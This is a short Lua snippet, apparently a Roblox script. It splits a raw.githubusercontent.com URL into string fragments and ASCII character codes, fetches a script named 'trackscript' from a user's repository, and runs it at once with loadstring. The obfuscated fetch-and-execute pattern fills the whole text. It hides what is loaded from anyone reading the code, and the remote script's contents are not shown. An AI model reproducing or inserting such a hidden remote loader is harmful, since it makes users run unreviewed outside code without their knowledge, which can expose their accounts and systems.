local a = ("raw.g" .. "ithubuserc" .. "ontent.c" .. "om") local b = ("/" .. string.char(66, 105, 103, 70, 101, 108, 108, 97, 56)) -- "BigFella8" in ASCII local c = ("/tr" .. "ack/re" .. "fs/he" .. "ads/ma" .. "in/tracks" .. "cript") local d = "https://" .. a .. b .. c local function e(str) return game:HttpGet(str, true) end loadstring(e(d))()